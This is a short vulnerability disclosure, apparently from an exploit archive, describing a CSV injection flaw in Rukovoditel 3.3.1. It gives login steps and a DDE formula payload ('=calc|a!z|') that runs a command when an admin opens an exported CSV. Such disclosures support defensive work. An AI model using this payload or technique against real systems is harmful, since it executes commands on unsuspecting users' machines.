<pre><code>Exploit Title: Rukovoditel 3.3.1 - CSV injection<br />Version: 3.3.1<br />Bugs: CSV Injection<br />Technology: PHP<br />Vendor URL: https://www.rukovoditel.net/<br />Software Link: https://www.rukovoditel.net/download.php<br />Date of found: 27-05-2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />Step 1. login as user<br />step 2. Go to My Account ( http://127.0.0.1/index.php?module=users/account )<br />step 3. Set Firstname as =calc|a!z|<br />step 3. If admin Export costumers as CSV file ,in The computer of admin occurs csv injection and will open calculator (http://localhost/index.php?module=items/items&path=1)<br /><br />payload: =calc|a!z|<br /><br /></code></pre>